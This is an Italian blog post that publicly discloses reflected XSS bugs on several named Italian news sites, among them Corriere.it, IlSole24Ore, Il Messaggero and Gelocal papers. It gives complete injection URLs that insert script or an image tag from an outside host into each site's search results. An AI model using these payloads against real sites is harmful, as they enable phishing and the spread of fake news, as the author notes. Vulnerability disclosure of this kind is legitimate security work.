CodeSnippet

Oggi ho letto quest’articolo su Geekissimo, e mi sono domandato: dov’è la notizia? Vabè, si sa, da Geekissimo ogni tanto qualche articolo del genere puoi aspettartelo, è fisiologico. Poi la giornata scorre e ne parlano anche Mantellini e Pino Bruno. Scrivo un commento su quest’ultimo blog dicendo che in realtà la vulnerabilità era già nota da tempo e che poi volendo se ne trovano quante ne vogliamo in giro per il web. Mi tengo per me alcune cose, che pubblicherò poi dopo.

Insomma, le XSS colpiscono tutti i siti del mondo, non mi sembra un’argomento di primaria importanza. Ma per alcuni invece lo è, scrivo su uno dei forum che frequento un post commentando il clamore della blogosfera italiana per qualcosa che in realtà non dovrebbe avere un’importanza così primaria su una vulnerabilità già nota e sulla quale nessuno ha accennato la fonte primaria (come preciso nel post, l’autore potrebbe anche averla trovata sul serio, ma chi fa informazione dovrebbe ‘informarsi’, vabè passiamo oltre).

Così, Pino Bruno, risponde al mio commento provocatorio sul suo sito, nel quale ho scritto che se volevo potevo trovarne su 10 siti d’informazione italiana bug del genere. Accetto la sfida e parto, pubblico le prime due, quelle su Corriere.it e IlSole24Ore.com che ho scritto nel post sul forum linkato sopra.

Per il primo sito basta mettere

qualcosa del genere sul form di ricerca in alto, risultato? Eccolo:

Sul secondo stessa cosa, qualcosa di molto simile

Ecco il link diretto al bug: http://www.ricerca24.ilsole24ore.com/fc?keyWords=%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22%3E+document.write%28%22%3Ccenter%3E%3Cimg+src%3D%27http%3A%2F%2Fmedia.ebaumsworld.com%2Fpicture%2Fdstructor%2FOwned.png%27+%2F%3E%3C%2Fcenter%3E%22%29%3B+%3C%2Fscript%3E%3Ctitle%3E&channelsId=informazione%7Cborsa%7C47%7C33%7C30%7C32%7C43%7C40%7C35&cmd=static&chId=30&path=%2Fsearch%2Fsearch_engine.jsp.

Ecco lo screen, l’immagine viene sempre messa in alto a tutto:

Messaggero.it, il bug c’è pure lì, basta mettere qualcosa del genere <script>alert(0)</script>.

In questo caso il form per l’inserimento ha un limite palloso, che ci obbliga ad usare massimo 25 caratteri, in realtà non è una limitazione così grande, si può superarlo

IlPiccolo, simile agli altri.

Link diretto http://ricerca.gelocal.it/ilpiccolo?query=%3C/title%3E%3Cscript%3E+document.write(‘+%3Ccenter%3E%3Cimg+src=%5C’+http://media.ebaumsworld.com/picture/dstructor/Owned.png%5C’+++/%3E%3C/center%3E’+);+%3C/script%3E%3Ctitle%3E&view=locali.il+Piccolo.

Aggiornerò il post più avanti, per ora mi sono stufato di fare bug hunting.

Le immagini sono ridimensionate, fanno un pò pena, cliccateci sopra per vederle in dimensione normale.

Aggiornamenti:
GazzettaDiReggio

Link: http://ricerca.gelocal.it/gazzettadireggio?query=%3C/title%3E%3Cscript%3E+document.write(‘%3Ccenter%3E%3Cimg+src=%5C’++http://media.ebaumsworld.com/picture/dstructor/Owned.png%5C’++++/%3E%3C/center%3E’);+%3C/script%3E%3Ctitle%3E&view=locali.la+Gazzetta+di+Reggio.

gazzettadiparma.it

Link: http://www.gazzettadiparma.it/ricerca/ricerca_risultati.php?q=%3Cimg+src%3D%27http%3A%2F%2Fmedia.ebaumsworld.com%2Fpicture%2Fdstructor%2FOwned.png%27+++++%2F%3E&dove=sito&cx=partner-pub-6882244760285643%3Ahww88m-2b3i&ie=ISO-8859-1

Vabè, finiamola qui, tanto le vulnerabilità sono tutti uguali, per il semplice fatto che i siti sono scritti più o meno dalle stesse web agency. Ci tengo a precisare che la vulnerabilità agisce a lato client, quindi niente ripercussioni sul sito, semplicemente vulnerabilità di questo tipo possono essere sfruttate per fare phishing o diffondere false notizie (come ha già fatto notare Valentino Marangi sul suo blog creando un’immagine che contiene una notizia falsa).

I bug potrebbero essere stati già scovati da qualcun altro in precedenza, non ho controllato personalmente, potete guardare su xssed.com.

Post correlati: